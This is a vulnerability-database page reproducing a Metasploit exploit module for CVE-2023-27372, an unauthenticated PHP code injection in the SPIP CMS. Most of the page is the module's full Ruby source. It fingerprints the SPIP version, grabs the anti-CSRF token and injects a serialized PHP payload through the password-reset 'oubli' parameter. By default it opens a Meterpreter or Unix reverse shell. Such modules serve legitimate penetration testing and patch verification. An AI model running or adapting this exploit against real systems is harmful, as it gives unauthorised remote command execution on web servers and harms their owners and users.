Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

SPIP Remote Command Execution Exploit

🗓️ 18 Apr 2023 00:00:00Reported by metasploitType 
zdt
 zdt🔗 0day.today👁 4014 Views

This module exploits a PHP code injection in SPIP, allowing an unauthenticated user to execute arbitrary commands with web user privileges. Vulnerable versions are <3.2.18, <4.0.10, <4.1.18 and <4.2.1

Related
Code
ReporterTitlePublishedViews
Family
0day.today		SPIP v4.2.0 - Remote Code Execution (Unauthenticated) Exploit
26 Jun 202300:00
zdt
GithubExploit		Exploit for Deserialization of Untrusted Data in Spip
11 Jul 202310:00
githubexploit
GithubExploit		Exploit for Deserialization of Untrusted Data in Spip
5 Jul 202314:41
githubexploit
GithubExploit		Exploit for Deserialization of Untrusted Data in Spip
28 Apr 202513:48
githubexploit
GithubExploit		Exploit for Deserialization of Untrusted Data in Spip
1 Jul 202317:08
githubexploit
GithubExploit		Exploit for Deserialization of Untrusted Data in Spip
7 Sep 202316:17
githubexploit
GithubExploit		Exploit for Deserialization of Untrusted Data in Spip
7 Mar 202600:14
githubexploit
GithubExploit		Exploit for Deserialization of Untrusted Data in Spip
31 Jul 202320:32
githubexploit
GithubExploit		Exploit for Deserialization of Untrusted Data in Spip
25 Jun 202319:30
githubexploit
GithubExploit		Exploit for Deserialization of Untrusted Data in Spip
24 Feb 202600:22
githubexploit
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::CmdStager
  include Msf::Exploit::Remote::HttpClient
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'SPIP form PHP Injection',
        'Description' => %q{
          This module exploits a PHP code injection in SPIP. The vulnerability exists in the
          oubli parameter and allows an unauthenticated user to execute arbitrary commands
          with web user privileges. Branches 3.2, 4.0, 4.1 and 4.2 are concerned. Vulnerable versions
          are <3.2.18, <4.0.10, <4.1.18 and <4.2.1.
        },
        'Author' => [
          'coiffeur',       # Initial discovery
          'Laluka',         # PoC
          'Julien Voisin'   # MSF module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'URL', 'https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-2-1-SPIP-4-1-8-SPIP-4-0-10-et.html' ],
          [ 'URL', 'https://therealcoiffeur.com/c11010' ],
          [ 'CVE', '2023-27372' ],
        ],
        'Privileged' => false,
        'Platform' => %w[php linux unix],
        'Arch' => [ARCH_PHP, ARCH_CMD],
        'Targets' => [
          [
            'Automatic (PHP In-Memory)',
            {
              'Platform' => 'php',
              'Arch' => ARCH_PHP,
              'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' },
              'Type' => :php_memory,
              'Payload' => {
                'BadChars' => "\x22\x00"
              }
            }
          ],
          [
            'Automatic (Unix In-Memory)',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' },
              'Type' => :unix_memory,
              'Payload' => {
                'BadChars' => "\x22\x00\x27"
              }
            }
          ],
        ],
        'Notes' => {
          'Stability' => [ CRASH_SAFE ],
          'Reliability' => [ REPEATABLE_SESSION ],
          'SideEffects' => [IOC_IN_LOGS]
        },
        'DefaultTarget' => 0,
        'DisclosureDate' => '2023-02-27'
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to SPIP application', '/']),
      ]
    )
  end

  def check
    uri = normalize_uri(target_uri.path, 'spip.php')
    res = send_request_cgi({ 'uri' => uri.to_s })

    return Exploit::CheckCode::Unknown('Target is unreachable.') unless res
    return Exploit::CheckCode::Unknown("Target responded with unexpected HTTP response code: #{res.code}") unless res.code == 200

    version_string = res.get_html_document.at('head/meta[@name="generator"]/@content')&.text
    return Exploit::CheckCode::Unknown('Unable to find the version string on the page: spip.php') unless version_string =~ /SPIP (.*)/

    version = ::Regexp.last_match(1)

    if version.nil? && res.headers['Composed-By'] =~ /SPIP (.*) @/
      version = ::Regexp.last_match(1)
    end

    return Exploit::CheckCode::Unknown('Unable to determine the version of SPIP') unless version

    print_status("SPIP Version detected: #{version}")

    rversion = Rex::Version.new(version)
    if rversion >= Rex::Version.new('4.2.0')
      if rversion < Rex::Version.new('4.2.1')
        return Exploit::CheckCode::Appears
      end
    elsif rversion >= Rex::Version.new('4.1.0')
      if rversion < Rex::Version.new('4.1.18')
        return Exploit::CheckCode::Appears
      end
    elsif rversion >= Rex::Version.new('4.0.0')
      if rversion < Rex::Version.new('4.0.10')
        return Exploit::CheckCode::Appears
      end
    elsif rversion >= Rex::Version.new('3.2.0')
      if rversion < Rex::Version.new('3.2.18')
        return Exploit::CheckCode::Appears
      end
    end

    return Exploit::CheckCode::Safe
  end

  def execute_command(cmd, args = {})
    send_request_cgi(
      {
        'uri' => args['uri'],
        'method' => 'POST',
        'vars_post' => {
          'page' => 'spip_pass',
          'lang' => 'fr',
          'formulaire_action' => 'oubli',
          'formulaire_action_args' => args['csrf'],
          'oubli' => cmd
        }
      }
    )
  end

  def exploit
    uri = normalize_uri(target_uri.path, 'spip.php?page=spip_pass&lang=fr')
    res = send_request_cgi({ 'uri' => uri })

    fail_with(Msf::Exploit::Failure::Unreachable, "The request to uri: #{uri} did not respond") unless res
    fail_with(Msf::Exploit::Failure::UnexpectedReply, "Got an http code that isn't 200: #{res.code}, when sending a request to uri: #{uri}") unless res&.code == 200

    csrf = ''
    unless (node = res.get_html_document.xpath('//form//input[@name="formulaire_action_args"]')).empty?
      csrf = node.first['value']
    end

    print_status("Got anti-csrf token: #{csrf}")

    print_status("#{rhost}:#{rport} - Attempting to exploit...")

    oubli = ''
    case target['Type']
    when :php_memory
      oubli = "s:#{payload.encoded.length + 6 + 2}:\"<?php #{payload.encoded}?>\";"
    when :unix_memory
      oubli = "s:#{payload.encoded.length + 14 + 4}:\"<?php system('#{payload.encoded}')?>\";"
    end
    execute_command(oubli, { 'uri' => uri, 'csrf' => csrf })
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
18 Apr 2023 00:00Current
10High risk
Vulners AI Score10
CVSS 3.19.8
EPSS0.9312
SSVC
spipphpcode injectionunauthenticated userarbitrary commandsweb user privilegesvulnerabilityversionsmetasploithttpsecurityupdatecveplatformtargetsstabilityreliabilityside effectsdisclosure date
4014